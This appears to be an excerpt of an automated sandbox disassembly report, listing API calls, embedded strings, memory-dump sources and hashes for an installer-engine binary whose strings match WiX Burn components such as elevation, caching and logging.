                                                                                                                • Instruction ID: 4bd1867a273cbc99915a3666975c66fa44ed0c4adaf032ae87e9d80a588a95ba
                                                                                                                • Opcode Fuzzy Hash: 0f9ecf751db0ca1fd417de3d3354b031ef22d0f9f940e7d5f12ae20eaa995693
                                                                                                                • Instruction Fuzzy Hash: 5821E173948259BBDB2296D48C43BAEBBAD9F92B25F210016FD10B6181DB749E0192D4
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(00000000,00000000,009EB500,000000FF,feclient.dll,000000FF,00000000,00000000,?,?,?,009C67DE,?,00000001,?,009EB4A0), ref: 009C5C45
                                                                                                                Strings
                                                                                                                • Failed grow array of ordered patches., xrefs: 009C5CDE
                                                                                                                • feclient.dll, xrefs: 009C5C3B, 009C5D65
                                                                                                                • Failed to copy target product code., xrefs: 009C5D78
                                                                                                                • Failed to insert execute action., xrefs: 009C5C9A
                                                                                                                • Failed to plan action for target product., xrefs: 009C5CF0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareString
                                                                                                                • String ID: Failed grow array of ordered patches.$Failed to copy target product code.$Failed to insert execute action.$Failed to plan action for target product.$feclient.dll
                                                                                                                • API String ID: 1825529933-3477540455
                                                                                                                • Opcode ID: 8274f984b65c3c2483cb1ae6672aebd93b2c4a79ab046e2ac52d6b14a8c53852
                                                                                                                • Instruction ID: 37293a2a7d68b260aa74c3c35a717d36f941998838e405547176942447f118da
                                                                                                                • Opcode Fuzzy Hash: 8274f984b65c3c2483cb1ae6672aebd93b2c4a79ab046e2ac52d6b14a8c53852
                                                                                                                • Instruction Fuzzy Hash: 648135B5A0474A9FCB14CF58C880EAA77A5FF48324B128669FD658B352C730EC91CF91
                                                                                                                APIs
                                                                                                                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,009DD262,00000000,00000000,00000000,00000000,00000000,009D2F1D), ref: 009DCB2F
                                                                                                                • __fassign.LIBCMT ref: 009DCBAA
                                                                                                                • __fassign.LIBCMT ref: 009DCBC5
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 009DCBEB
                                                                                                                • WriteFile.KERNEL32(?,00000000,00000000,009DD262,00000000,?,?,?,?,?,?,?,?,?,009DD262,00000000), ref: 009DCC0A
                                                                                                                • WriteFile.KERNEL32(?,00000000,00000001,009DD262,00000000,?,?,?,?,?,?,?,?,?,009DD262,00000000), ref: 009DCC43
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                • String ID:
                                                                                                                • API String ID: 1324828854-0
                                                                                                                • Opcode ID: 3c4c29bbd670d1274e4c3a0ee60dfb8c78ff8dca23dd1db1db71fd5fbb68609c
                                                                                                                • Instruction ID: ac0fac1a6f0803b926eb74117ab1283451027ae5ddbbd9d1fdf7a20eb88f725e
                                                                                                                • Opcode Fuzzy Hash: 3c4c29bbd670d1274e4c3a0ee60dfb8c78ff8dca23dd1db1db71fd5fbb68609c
                                                                                                                • Instruction Fuzzy Hash: 185192B1A5024A9FDB10CFB8D885AEEBBF8EF09310F14851BE655E7351E7309941CB60
                                                                                                                APIs
                                                                                                                • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,?,000000FF,00000000,00000100,00000000,?,?,?,009B7113,000000B8,0000001C,00000100), ref: 009C92A4
                                                                                                                • CompareStringW.KERNEL32(00000000,00000001,?,000000FF,009EB4B8,000000FF,?,?,?,009B7113,000000B8,0000001C,00000100,00000100,00000100,000000B0), ref: 009C932E
                                                                                                                Strings
                                                                                                                • BA aborted detect forward compatible bundle., xrefs: 009C9398
                                                                                                                • comres.dll, xrefs: 009C93B0
                                                                                                                • detect.cpp, xrefs: 009C938E
                                                                                                                • Failed to initialize update bundle., xrefs: 009C93D1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareString
                                                                                                                • String ID: BA aborted detect forward compatible bundle.$Failed to initialize update bundle.$comres.dll$detect.cpp
                                                                                                                • API String ID: 1825529933-439563586
                                                                                                                • Opcode ID: 3cd8383a69b89a8072c521c11fc64aad38ab0c5a72323169d9f6486232e2a38b
                                                                                                                • Instruction ID: a1eb6f3473a6ba7502d3d3b38a30228cd473b2ad2099f6013bb304dd436c0996
                                                                                                                • Opcode Fuzzy Hash: 3cd8383a69b89a8072c521c11fc64aad38ab0c5a72323169d9f6486232e2a38b
                                                                                                                • Instruction Fuzzy Hash: C051D071A00215BFDF159F64CC89FAAB76AFF05320F104269F9249B2A1C771EC60DB92
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(009A5479,000000FF,00AAC56B,E9009EBA,009A53BD,00000000,?,E9009EBA,00000000), ref: 009BAC94
                                                                                                                • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,009A5479,000000FF,00AAC56B,E9009EBA,009A53BD,00000000,?,E9009EBA,00000000), ref: 009BACD8
                                                                                                                Strings
                                                                                                                • Failed to get signer chain from authenticode certificate., xrefs: 009BAD06
                                                                                                                • Failed authenticode verification of payload: %ls, xrefs: 009BAC75
                                                                                                                • Failed to verify expected payload against actual certificate chain., xrefs: 009BAD1E
                                                                                                                • Failed to get provider state from authenticode certificate., xrefs: 009BACC2
                                                                                                                • cache.cpp, xrefs: 009BAC6A, 009BACB8, 009BACFC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast
                                                                                                                • String ID: Failed authenticode verification of payload: %ls$Failed to get provider state from authenticode certificate.$Failed to get signer chain from authenticode certificate.$Failed to verify expected payload against actual certificate chain.$cache.cpp
                                                                                                                • API String ID: 1452528299-2590768268
                                                                                                                • Opcode ID: 87be349dcb296a4f377cdf9fbfa51c6ae092cae3bf46566b7df7fea2e84e4dd0
                                                                                                                • Instruction ID: e4d4b8b12424af06d54dc5b540d9ff162532249260d143d9106206338ef2de8b
                                                                                                                • Opcode Fuzzy Hash: 87be349dcb296a4f377cdf9fbfa51c6ae092cae3bf46566b7df7fea2e84e4dd0
                                                                                                                • Instruction Fuzzy Hash: DD41A572D41229ABDB119BD8CD46BEEBBB8EF84730F010129FA51BB281D7745D048BE1
                                                                                                                APIs
                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 009E033C
                                                                                                                • GetComputerNameW.KERNEL32(?,?), ref: 009E0394
                                                                                                                Strings
                                                                                                                • Executable: %ls v%d.%d.%d.%d, xrefs: 009E03F0
                                                                                                                • === Logging started: %ls ===, xrefs: 009E03BF
                                                                                                                • --- logging level: %hs ---, xrefs: 009E0454
                                                                                                                • Computer : %ls, xrefs: 009E0402
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Name$ComputerFileModule
                                                                                                                • String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
                                                                                                                • API String ID: 2577110986-3153207428
                                                                                                                • Opcode ID: c704850c81ece46886f97ead4723fbd351f75cc53fff1203da50d9ce3d43aa27
                                                                                                                • Instruction ID: 2663a36e8279fd0c3001ab96ad93351d815db013705b554ac0372d7f052262db
                                                                                                                • Opcode Fuzzy Hash: c704850c81ece46886f97ead4723fbd351f75cc53fff1203da50d9ce3d43aa27
                                                                                                                • Instruction Fuzzy Hash: B34196F1D0015C9BCB11DF65DD85BAA73BCEB94304F0081A5F609E3192E6719EC58F65
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000001,009EB500,?,00000001,000000FF,?,?,75C0B390,00000000,00000001,00000000,?,009B74E6), ref: 009BD560
                                                                                                                Strings
                                                                                                                • UX aborted elevation requirement., xrefs: 009BD475
                                                                                                                • Failed to create pipe and cache pipe., xrefs: 009BD4BD
                                                                                                                • Failed to connect to elevated child process., xrefs: 009BD549
                                                                                                                • elevation.cpp, xrefs: 009BD46B
                                                                                                                • Failed to create pipe name and client token., xrefs: 009BD4A1
                                                                                                                • Failed to elevate., xrefs: 009BD542
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle
                                                                                                                • String ID: Failed to connect to elevated child process.$Failed to create pipe and cache pipe.$Failed to create pipe name and client token.$Failed to elevate.$UX aborted elevation requirement.$elevation.cpp
                                                                                                                • API String ID: 2962429428-3003415917
                                                                                                                • Opcode ID: d7c1adefb8135abe4aed705c6fc1681c0276f613b7ca9ac84d7f9087867f9266
                                                                                                                • Instruction ID: dae5470dd983c6e9dd7edc3e3e2b06233dde1a155e800b00cd897a356f17810b
                                                                                                                • Opcode Fuzzy Hash: d7c1adefb8135abe4aed705c6fc1681c0276f613b7ca9ac84d7f9087867f9266
                                                                                                                • Instruction Fuzzy Hash: 333180726467297BE721A6A4CD43FFAB35C9F81334F104205FA04AB1C5EBE1AE0083D5
                                                                                                                APIs
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,009BAD40,?,00000000,00000000), ref: 009BD2E9
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009BD2F5
                                                                                                                  • Part of subcall function 009BCF25: WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,009BD365,00000000,?,?,009BC7C9,00000001,?,?,?,?,?), ref: 009BCF37
                                                                                                                  • Part of subcall function 009BCF25: GetLastError.KERNEL32(?,?,009BD365,00000000,?,?,009BC7C9,00000001,?,?,?,?,?,00000000,00000000,?), ref: 009BCF41
                                                                                                                • CloseHandle.KERNEL32(00000000,00000000,?,?,009BC7C9,00000001,?,?,?,?,?,00000000,00000000,?,?,?), ref: 009BD376
                                                                                                                Strings
                                                                                                                • Failed to create elevated cache thread., xrefs: 009BD323
                                                                                                                • elevation.cpp, xrefs: 009BD319
                                                                                                                • Failed to pump messages in child process., xrefs: 009BD34D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
                                                                                                                • String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
                                                                                                                • API String ID: 3606931770-4134175193
                                                                                                                • Opcode ID: cb75d7e5c4015c24bb2224bcaaf46ce2271c1b64335284a4a84e238fab62191b
                                                                                                                • Instruction ID: cbe79184646a6154d53e9d939a0d2e6ca34be7216f07da012d736c00165fe95b
                                                                                                                • Opcode Fuzzy Hash: cb75d7e5c4015c24bb2224bcaaf46ce2271c1b64335284a4a84e238fab62191b
                                                                                                                • Instruction Fuzzy Hash: A84106B6D0121DAF8B01DF99D985AEEBBF8FF48320F10416AF914A7340E770A9008B95
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,?,00000000,00000000,BundleUpgradeCode), ref: 009E15DA
                                                                                                                • lstrlenW.KERNEL32(?,00000002,00000001,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 009E163C
                                                                                                                • lstrlenW.KERNEL32(?), ref: 009E1648
                                                                                                                • RegSetValueExW.ADVAPI32(?,?,00000000,00000007,?,?,00000001,?,?,00000002,00000001,00000000,00000000,BundleUpgradeCode), ref: 009E168B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen$Value
                                                                                                                • String ID: BundleUpgradeCode$regutil.cpp
                                                                                                                • API String ID: 198323757-1648651458
                                                                                                                • Opcode ID: e3c0ccd21a3a87cb188c08b457f1f686d0723c1386ebf22add8c8aecdd566039
                                                                                                                • Instruction ID: 62a5183554013e35877b43d18ca25d34d11902dec06629f440d12d87f20da23d
                                                                                                                • Opcode Fuzzy Hash: e3c0ccd21a3a87cb188c08b457f1f686d0723c1386ebf22add8c8aecdd566039
                                                                                                                • Instruction Fuzzy Hash: E3417172900669AFCB12DF998C85AAEBBB8FB44B50F050155FD11AB210D730DD119BE0
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(00A0B5FC,00000000,?,?,?,009B4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009A54FA,?), ref: 009E0533
                                                                                                                • CreateFileW.KERNEL32(40000000,00000001,00000000,00000000,00000080,00000000,?,00000000,?,?,?,00A0B5F4,?,009B4207,00000000,Setup), ref: 009E05D7
                                                                                                                • GetLastError.KERNEL32(?,009B4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009A54FA,?,?,?), ref: 009E05E7
                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,009B4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009A54FA,?), ref: 009E0621
                                                                                                                  • Part of subcall function 009A2DBF: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 009A2F09
                                                                                                                • LeaveCriticalSection.KERNEL32(00A0B5FC,?,?,00A0B5F4,?,009B4207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009A54FA,?), ref: 009E067A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                • String ID: logutil.cpp
                                                                                                                • API String ID: 4111229724-3545173039
                                                                                                                • Opcode ID: 8f4699e26b320c5c738765806303f3c7e6f44572735a9671c6dba551197b5f51
                                                                                                                • Instruction ID: fdd2b3dc0eb7d60f0a8b3df97342eb497ad7ebb306016e6035e7fed9463e2c68
                                                                                                                • Opcode Fuzzy Hash: 8f4699e26b320c5c738765806303f3c7e6f44572735a9671c6dba551197b5f51
                                                                                                                • Instruction Fuzzy Hash: C831F93190029EFBDB129FA69D85F5E766CEBC0B54F010264F901AB160D7B1DDA19BA0
                                                                                                                APIs
                                                                                                                • _MREFOpen@16.MSPDB140-MSVCRT ref: 009C39F4
                                                                                                                Strings
                                                                                                                • Failed to escape string., xrefs: 009C3A76
                                                                                                                • Failed to format property string part., xrefs: 009C3A6F
                                                                                                                • Failed to format property value., xrefs: 009C3A7D
                                                                                                                • %s%="%s", xrefs: 009C3A27
                                                                                                                • Failed to append property string part., xrefs: 009C3A68
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open@16
                                                                                                                • String ID: %s%="%s"$Failed to append property string part.$Failed to escape string.$Failed to format property string part.$Failed to format property value.
                                                                                                                • API String ID: 3613110473-515423128
                                                                                                                • Opcode ID: 0bcb7f90073295da72c45945e9bbdab24c1f66da9d16170c76a48b63a4a62cc6
                                                                                                                • Instruction ID: 75d9975d3303eed4a202633d56eb877d5456d0743aea10dd974ced65d7033959
                                                                                                                • Opcode Fuzzy Hash: 0bcb7f90073295da72c45945e9bbdab24c1f66da9d16170c76a48b63a4a62cc6
                                                                                                                • Instruction Fuzzy Hash: A531AD72D0421AEBCF159F98CC42FAEB768AB40714F10C26EF91166251D770AF60DB92
                                                                                                                APIs
                                                                                                                • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000000,00000101,?,009E432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,009BA063,00000001), ref: 009E4203
                                                                                                                • GetLastError.KERNEL32(00000002,?,009E432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,009BA063,00000001,000007D0,00000001,00000001,00000003), ref: 009E4212
                                                                                                                • MoveFileExW.KERNEL32(00000003,00000001,00000000,00000001,00000000,?,009E432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,009BA063,00000001), ref: 009E42A6
                                                                                                                • GetLastError.KERNEL32(?,009E432E,00000003,00000001,00000001,000007D0,00000003,00000000,?,009BA063,00000001,000007D0,00000001), ref: 009E42B0
                                                                                                                  • Part of subcall function 009E4440: FindFirstFileW.KERNEL32(009C923A,?,00000100,00000000,00000000), ref: 009E447B
                                                                                                                  • Part of subcall function 009E4440: FindClose.KERNEL32(00000000), ref: 009E4487
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$ErrorFindLastMove$CloseFirst
                                                                                                                • String ID: \$fileutil.cpp
                                                                                                                • API String ID: 3479031965-1689471480
                                                                                                                • Opcode ID: ba7f98153934c9f6c52a022eaa92b5b91017462666c0d29c4829b384bc5fd786
                                                                                                                • Instruction ID: e9032142ebc96e14b4ec8370da546dd40e2d242dfb07aaa3b70402df3c035c01
                                                                                                                • Opcode Fuzzy Hash: ba7f98153934c9f6c52a022eaa92b5b91017462666c0d29c4829b384bc5fd786
                                                                                                                • Instruction Fuzzy Hash: F431E336A052A6ABDF235F9BCC40B6F766DFFA1760B118029FE24AB350D3708C4096D0
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(00000000,00000000,00000000,?,?,?,009A5932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 009A733E
                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,00000000,00000100,00000000,?,?,?,009A5932,00000100,00000100,00000000,00000000,00000001,00000000,00000100), ref: 009A741D
                                                                                                                Strings
                                                                                                                • Failed to get unformatted string., xrefs: 009A73AE
                                                                                                                • Failed to get variable: %ls, xrefs: 009A737F
                                                                                                                • Failed to format value '%ls' of variable: %ls, xrefs: 009A73E7
                                                                                                                • *****, xrefs: 009A73D9, 009A73E6
                                                                                                                • Failed to get value as string for variable: %ls, xrefs: 009A740C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                • String ID: *****$Failed to format value '%ls' of variable: %ls$Failed to get unformatted string.$Failed to get value as string for variable: %ls$Failed to get variable: %ls
                                                                                                                • API String ID: 3168844106-2873099529
                                                                                                                • Opcode ID: 4b9c29d5c04dfa9b1a5e049526265222e8d248837f920cfe91069529596c9103
                                                                                                                • Instruction ID: 9d800ce10165c7051e614f74aed649779b21ebbb09f08d37bdbc1a9d38981324
                                                                                                                • Opcode Fuzzy Hash: 4b9c29d5c04dfa9b1a5e049526265222e8d248837f920cfe91069529596c9103
                                                                                                                • Instruction Fuzzy Hash: 0F31D43290865AFBCF225F80CC06FAEBBA9FF56321F014525FD106A160D775AE51ABD0
                                                                                                                APIs
                                                                                                                • InitializeAcl.ADVAPI32(?,00000008,00000002,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 009B8E37
                                                                                                                • GetLastError.KERNEL32 ref: 009B8E41
                                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,00000001,20000004,00000000,00000000,?,00000000,00000003,000007D0,?,00000000,00000000,?,?), ref: 009B8EA1
                                                                                                                Strings
                                                                                                                • cache.cpp, xrefs: 009B8E65
                                                                                                                • Failed to allocate administrator SID., xrefs: 009B8E1D
                                                                                                                • Failed to initialize ACL., xrefs: 009B8E6F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesErrorFileInitializeLast
                                                                                                                • String ID: Failed to allocate administrator SID.$Failed to initialize ACL.$cache.cpp
                                                                                                                • API String ID: 669721577-1117388985
                                                                                                                • Opcode ID: c4622bd9427734d29f42103f08ecfea184d582685626ea0431ff5e9e6df516a7
                                                                                                                • Instruction ID: d3aca0fa0ba0445a63c722a867ed3ccee376eea9ef325c734c4cfe4efde0fae0
                                                                                                                • Opcode Fuzzy Hash: c4622bd9427734d29f42103f08ecfea184d582685626ea0431ff5e9e6df516a7
                                                                                                                • Instruction Fuzzy Hash: 0A21A832A44228B7DB21AAD59D85FEFB76DAB84B30F114125FE14FB280DA749D00D790
                                                                                                                APIs
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,00000000,crypt32.dll,?,?,009B4028,00000001,feclient.dll,?,00000000,?,?,?,009A4B12), ref: 009A424D
                                                                                                                • GetLastError.KERNEL32(?,?,009B4028,00000001,feclient.dll,?,00000000,?,?,?,009A4B12,?,?,009EB488,?,00000001), ref: 009A4259
